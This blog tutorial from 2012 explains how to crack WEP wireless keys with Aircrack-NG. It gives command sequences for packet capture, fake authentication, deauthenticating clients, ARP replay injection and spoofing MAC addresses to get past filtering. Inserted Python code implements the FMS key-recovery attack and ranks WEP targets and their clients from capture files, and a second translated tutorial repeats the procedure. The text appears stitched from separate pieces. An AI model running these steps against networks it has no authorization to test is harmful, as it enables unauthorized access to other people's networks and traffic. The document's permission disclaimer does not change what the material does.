
Thursday 4 October 2012

Aircrack-NG (cracking WLAN)

Before you continue to follow this tutorial, you might want to take a look at pyCracker, a useful tool which – hopefully – will make the whole process a little simpler for you.
This HOWTO is largely based on Aircrack's own documentation. In addition you'll find the latest version of "Aircrack Next Generation" here and Aircrack-PTW here.
Any suggestions for improvement are welcome. The aim is to keep this HOWTO as simple and comprehensive as possible, as I believe that brevity is the soul of wit.
DISCLAIMER:
Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network’s security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
GENERAL INFORMATION:
Generally speaking there are 3 types of attacks:
1. Brute force attack
2. Dictionary attack
3. Statistical attack
By exploiting several security weaknesses of the WEP protocol, Aircrack-NG uses a statistical method to recover WEP keys: WEP sends the 24-bit RC4 initialization vector (IV) of every packet in the clear, and the first plaintext byte of every data frame is known, so each captured packet leaks a little information about the key. Provided that you have collected a sufficient number of IVs (= Initialization Vectors), and depending on the length of the encryption key, determining the actual WEP key takes less than a minute on a common PC.
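The statistical method described above, as an added worked example (this is not aircrack-ng's code and is a simplification of what it does): it implements the original Fluhrer-Mantin-Shamir "resolved IV" statistic, votes for each secret key byte in turn, and searches the best-voted candidates with an aircrack-style fudge factor. The secret key and the capture are constructed in-process; the capture is assumed to contain only the FMS weak IVs (A+3, 255, X), which in real traffic are a small fraction of all packets. That is why the packet counts quoted further down are so large, and why the Korek and PTW statistics used by Aircrack-NG and Aircrack-PTW, which can use far more of the captured IVs, need fewer packets.

```python
"""FMS-style statistical recovery of a WEP-40 key from (IV, first ciphertext byte) pairs.

Added example, not aircrack-ng's code. The AP's secret key and the IVs in the capture are
constructed here; everything else follows the published FMS attack.
"""
from collections import Counter

IV_LEN = 3            # WEP prepends a 3-byte cleartext IV to the secret key: RC4 key = IV || secret
KEY_LEN = 5           # WEP-40 (a "64-bit" key) has 5 secret bytes
SNAP_BYTE = 0xAA      # every WEP data frame body starts with the LLC/SNAP header AA AA 03 ...,
                      # so keystream[0] = ciphertext[0] ^ 0xAA is known for every captured packet
SECRET_KEY = bytes([0x1F, 0xA2, 0x7B, 0x3C, 0xD9])   # constructed: the key the demo recovers


def rc4_ksa_prefix(key, rounds):
    """Run the first `rounds` rounds (i = 0 .. rounds-1) of the RC4 key schedule; return (S, j)."""
    S = list(range(256))
    j = 0
    for i in range(rounds):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """First n RC4 keystream bytes for `key` (full 256-round KSA, then PRGA)."""
    S, _ = rc4_ksa_prefix(key, 256)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def make_capture(secret):
    """Constructed capture: (iv, first ciphertext byte) for every FMS weak IV (A+3, 255, X)."""
    capture = []
    for a in range(len(secret)):
        for x in range(256):
            iv = bytes([a + IV_LEN, 255, x])
            capture.append((iv, rc4_keystream(iv + secret, 1)[0] ^ SNAP_BYTE))
    return capture


def vote_next_byte(capture, prefix):
    """FMS votes for secret byte len(prefix), i.e. RC4 key index a = 3 + len(prefix)."""
    a = IV_LEN + len(prefix)
    votes = Counter()
    for iv, c0 in capture:
        S, j = rc4_ksa_prefix(iv + prefix, a)       # KSA state just before round a
        if S[1] < a and (S[1] + S[S[1]]) == a:     # "resolved" IV: with prob ~e^-3 keystream[0] is S[a] after round a
            ks0 = c0 ^ SNAP_BYTE
            # round a sets S[a] = S_old[j_a] with j_a = j + S_old[a] + K[a], so K[a] = index(ks0) - j - S_old[a]
            votes[(S.index(ks0) - j - S[a]) & 0xFF] += 1
    return votes


def key_matches(capture, key):
    """Check a candidate key against a few packets' known first byte (aircrack-ng checks the WEP ICV instead)."""
    return all(rc4_keystream(iv + key, 1)[0] ^ SNAP_BYTE == c0 for iv, c0 in capture[:4])


def recover_key(capture, key_len=KEY_LEN, fudge=8):
    """Depth-first search over the `fudge` best-voted candidates per byte (aircrack-ng's fudge factor, -f)."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if key_matches(capture, prefix) else None
        for cand, _ in vote_next_byte(capture, prefix).most_common(fudge):
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    cap = make_capture(SECRET_KEY)
    print("votes for first secret byte:", vote_next_byte(cap, b"").most_common(3))
    found = recover_key(cap)
    print("recovered:", found.hex() if found else None, "expected:", SECRET_KEY.hex())
```

Each resolved weak IV votes for the correct byte only about 5% of the time and for a random byte otherwise, so the correct value stands out only after a few hundred resolved IVs per byte; the fudge-factor search covers the cases where it is not the top vote but still near the top, which is the same trade-off aircrack-ng's -f option exposes.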
HARDWARE:
I assume that you have successfully patched the driver for your wireless adapter (e.g. Ralink chipset), so I won’t go into this. I have tested packet injection and decryption with:
1. Intel® PRO/Wireless 2200BG (IPW2200)
2. Linksys WUSB54G V4.0 (RT2570)
I recommend "Linksys WUSB54G V4.0" as it has a decent reception and reasonable performance. If you need help patching & compiling from source, feel free to post your problems here as well.
DRIVERS & PATCHES:
Before you proceed you need to compile your own drivers & install patches for packet re-injection. You find instructions here.
PREREQUISITES:
1. You have successfully patched your wireless driver (see link above).
2. This HOWTO was written for Aircrack-NG v0.9.1 & Aircrack-PTW v1.0.0 on Kubuntu Feisty Fawn 7.04 (32-bit).
3. '00:09:5B:D7:43:A8' is the MAC address of my network, so you need to replace it with your own.
4. '00:00:00:00:00:00' is the MAC address of the target client, NOT that of your own wireless card.
COMMAND LINE:
Please make sure that you stick to the exact sequence of actions and pay attention to the section on MAC filtering. Replace <interface> in the commands with your wireless interface (e.g. wlan0, or the monitor interface airmon-ng creates).
* 1. Enable monitoring with “airmon-ng” (screenshot #1):
Quote:
sudo airmon-ng start <interface>
* 2. Packet capturing with “airodump-ng” (screenshot #2):
Quote:
sudo airodump-ng --channel <channel> --write <filename> <interface>
Alternatively, try this (to collect data from the target network only and hence increase performance):
Quote:
sudo airodump-ng --channel <channel> --bssid 00:09:5B:D7:43:A8 --write <filename> <interface>
NOTE:
--channel... Lock the card to the target's channel; optional, but without it airodump-ng hops channels, which severely slows down the collection process.
--bssid... MAC address of the target access point; optional, but specifying it makes airodump-ng keep only that network's frames and improves the collection process.
--write... Prefix of the capture files (<filename>-01.cap etc.); mandatory in our case, since aircrack-ng reads the IVs from the capture.
* 3.1. Now check if MAC filtering is enabled or turned off:
Quote:
sudo aireplay-ng -1 0 -e <essid> -a 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
NOTE:
-1... Fake authentication; the number after it is the reassociation delay in seconds ('0' means authenticate and associate once, without repeating).
-e... ESSID of target access point.
-a... MAC address of target access point.
-h... Source MAC address of your choice (your own card's address or a made-up one); the access point must accept an association from it, which is exactly what this step tests.
* 3.2. If the resulting output looks like this…
Quote:
18:22:32 Sending Authentication Request
18:22:32 Authentication successful
18:22:32 Sending Association Request
18:22:32 Association successful
…then MAC filtering is turned off & you can continue following section ‘No MAC filtering’, otherwise jump to section ‘MAC filtering’.
>> No MAC filtering <<
* 4. Packet Re-injection with "aireplay-ng" (screenshot #4):
Quote:
sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h MY:MA:CA:DD:RE:SS <interface>
You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests, so be a little patient at this point. As MAC filtering is off, any MAC address ('MY:MA:CA:DD:RE:SS') will do, but use the same one you fake-authenticated with in step 3.1: the access point only accepts data frames from a station that is associated.
Continue with #6.
NOTE:
-3… Standard ARP-request replay.
-b… MAC address of target access point.
-h… MAC address of your choice.
>> MAC filtering <<
* 4. Deauthentication with "aireplay-ng" (screenshot #3):
Quote:
sudo aireplay-ng -0 5 -a 00:09:5B:D7:43:A8 -c 00:00:00:00:00:00 <interface>
NOTE:
-0... Deauthentication; the number is how many deauthentication bursts to send (0 = keep sending until stopped).
-a... MAC address of target access point.
-c... MAC address of the client to deauthenticate (without -c all clients are deauthenticated).
* 5. Packet Re-injection with “aireplay-ng” (screenshot #4):
Quote:
sudo aireplay-ng -3 -b 00:09:5B:D7:43:A8 -h 00:00:00:00:00:00 <interface>
You'll now see the number of data packets shooting up in 'airodump-ng'. This process can take up to five minutes before you start receiving any ARP requests, so be a little patient at this point. With MAC filtering on, the access point only accepts frames from whitelisted stations, which is why the injected packets carry the MAC address of the client you deauthenticated in step 4 rather than your own.
NOTE:
-3… Standard ARP-request replay.
-b… MAC address of target access point.
-h… Client MAC address.
* 6. Decryption with “aircrack-ng” & “aircrack-ptw” (screenshot #5):
Aircrack-ng:
Quote:
sudo aircrack-ng <filename>-01.cap
Aircrack-PTW:
Quote:
./aircrack-ptw <filename>-01.cap
CAPTURING:
This is a summary based on information given here and there, respectively:
Aircrack-NG:
64-bit key: ~250,000 packets
128-bit key: ~1,500,000 packets
Aircrack-PTW:
64-bit key: ~20,000 packets [estimate]
128-bit key: ~85,000 packets
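The command-line procedure above leaves the operator reading airodump-ng's screen to pick the target, the client MAC for the MAC-filtering branch, and the moment there are enough IVs. As an added example (not part of this HOWTO and not aircrack-ng's own tooling), the script below does that from the CSV file airodump-ng writes beside the capture when you use --write (<filename>-01.csv) and compares the IV count with the packet counts listed under CAPTURING. The column layout is the one airodump-ng 1.x writes and is assumed to hold for 0.9.1 as well; the sample file embedded below is constructed, not a real capture.

```python
"""Added example: pick WEP targets and clients from an airodump-ng CSV and check the IV count
against the packet counts quoted in this HOWTO. Not aircrack-ng code; the CSV layout is the
one airodump-ng 1.x writes (assumed for 0.9.1), and SAMPLE_CSV is constructed."""
import csv
import io

# Packet counts from the CAPTURING section (Aircrack-NG Korek statistics vs Aircrack-PTW).
IVS_NEEDED = {
    ("korek", 64): 250_000, ("korek", 128): 1_500_000,
    ("ptw", 64): 20_000,    ("ptw", 128): 85_000,
}

# Constructed sample in the layout of <prefix>-01.csv: an AP table, a blank line, a station table.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
00:09:5B:D7:43:A8, 2012-10-04 18:20:01, 2012-10-04 18:25:30,  6,  54, WEP , WEP, , -42,      312,    23541,   0.  0.  0.  0,   6, MyWLAN,
00:14:6C:AA:BB:CC, 2012-10-04 18:20:02, 2012-10-04 18:25:30, 11,  54, WPA2, CCMP, PSK, -61,      290,        0,   0.  0.  0.  0,   9, Neighbour,
00:0F:66:12:34:56, 2012-10-04 18:20:03, 2012-10-04 18:25:29,  1,  11, WEP , WEP, , -77,      101,      812,   0.  0.  0.  0,   7, OldLink,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
00:1A:2B:3C:4D:5E, 2012-10-04 18:20:05, 2012-10-04 18:25:29, -55,      1820, 00:09:5B:D7:43:A8, MyWLAN
00:1A:2B:3C:4D:99, 2012-10-04 18:21:10, 2012-10-04 18:24:02, -70,        41, 00:09:5B:D7:43:A8,
00:21:5C:00:00:01, 2012-10-04 18:20:09, 2012-10-04 18:25:30, -66,       905, 00:14:6C:AA:BB:CC, Neighbour
"""


def _read_section(block):
    """Parse one comma-separated table (header row first) into a list of dicts."""
    rows = list(csv.reader(io.StringIO(block), skipinitialspace=True))
    header = [h.strip() for h in rows[0]]
    return [dict(zip(header, (f.strip() for f in row)))
            for row in rows[1:] if len(row) >= len(header)]


def parse_airodump_csv(text):
    """Return (access_points, stations); the two tables are separated by a blank line."""
    sections = [s for s in text.replace("\r\n", "\n").split("\n\n") if s.strip()]
    aps = _read_section(sections[0])
    stations = _read_section(sections[1]) if len(sections) > 1 else []
    return aps, stations


def wep_targets(aps):
    """WEP access points only (WPA/WPA2 networks are out of scope for this attack), most IVs first."""
    wep = [ap for ap in aps if ap["Privacy"].upper().startswith("WEP")]
    return sorted(wep, key=lambda ap: int(ap["# IV"]), reverse=True)


def clients_of(stations, bssid):
    """MACs of stations associated with `bssid`, busiest first: the -c / -h values for the MAC-filtering branch."""
    assoc = [s for s in stations if s["BSSID"].upper() == bssid.upper()]
    assoc.sort(key=lambda s: int(s["# packets"]), reverse=True)
    return [s["Station MAC"] for s in assoc]


def capture_status(ap, attack="ptw", key_bits=64):
    """Compare the IVs collected so far with the count needed for `attack` against a `key_bits` key."""
    have, need = int(ap["# IV"]), IVS_NEEDED[(attack, key_bits)]
    return {"bssid": ap["BSSID"], "essid": ap["ESSID"], "channel": int(ap["channel"]),
            "ivs": have, "needed": need, "ready": have >= need}


if __name__ == "__main__":
    aps, stations = parse_airodump_csv(SAMPLE_CSV)
    for ap in wep_targets(aps):
        for attack, bits in IVS_NEEDED:
            print(capture_status(ap, attack, bits))
        print("  clients:", clients_of(stations, ap["BSSID"]))
```

Run it against a real <filename>-01.csv with `parse_airodump_csv(open(path).read())`; the "# IV" column counts the packets with usable IVs, which is the figure the thresholds above refer to, not the raw frame count. One caveat: ESSIDs containing a comma break a plain CSV parse, so check the ESSID against what airodump-ng shows on screen before relying on it.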
FINALLY:
That’s it. I am open for further suggestions and hope to gain as much input as possible so that we can improve this guide and at the same time, keep it as simple as possible for other users.
----------------------------------
Introduction to aircrack-ng, a powerful tool for cracking wireless passwords on Ubuntu

Test platform: Y450 (T6600, 2.1 GHz), Ubuntu 10.04; successful.
1. Download and install aircrack-ng; I installed it straight from the repositories:
sudo apt-get install aircrack-ng
2. Enable the wireless card. 奶牛 (the author) needs to explain something here: for many people the wireless card is disabled under Windows, or has not been switched on in the vendor's power-management software; in that case it has to be enabled under Windows first before it can be turned on in Ubuntu. Once that is done, boot into Ubuntu, open a terminal and run ifconfig -a to check that the wlan interface is present; if it is, go on to the next step.
3. Preparation complete; start cracking. Open terminal ①:
sudo airmon-ng start wlan0
sudo airodump-ng mon0
The wireless networks now appear on screen, with their MAC addresses and channels. OK, press Ctrl+C to quit. Here we choose a network whose type is WEP as the target; note its channel and MAC address.
4. Open terminal ②:
sudo airodump-ng -c <channel> --bssid <target MAC> -w wep mon0
Here wep is the default name of the capture file; it can be changed.
5. Open terminal ③:
sudo aireplay-ng -1 0 -a <target MAC> -h <own MAC> mon0
(You can look up your own MAC with ifconfig -a in a new terminal.)
A success message should now appear. If it does not, the target probably does not support this or the system is unstable, and you need to change target. Once it succeeds, continue.
6. Next run: sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b <target MAC> -h <own MAC> mon0
The data count in terminal ② will now grow quickly; once it reaches 5000 you can start cracking (if aircrack-ng does not find the key, leave the capture running and try again later; the packet counts in the CAPTURING section above are the safer guide).
7. Open terminal ④:
sudo aircrack-ng wep*.cap
Cracking now starts. If you have run several sessions there may be several networks to choose from; pick one with the numbers 1, 2, 3, ... Barring surprises, you now have the key of this wireless network.
8. Finally, sudo airmon-ng stop mon0 to end monitor mode.
(sudo airmon-ng without arguments lists the wireless interfaces, including any mon interfaces you have started, so after several sessions you can see what is still up and stop it; sudo airmon-ng check lists processes that may interfere with monitor mode.)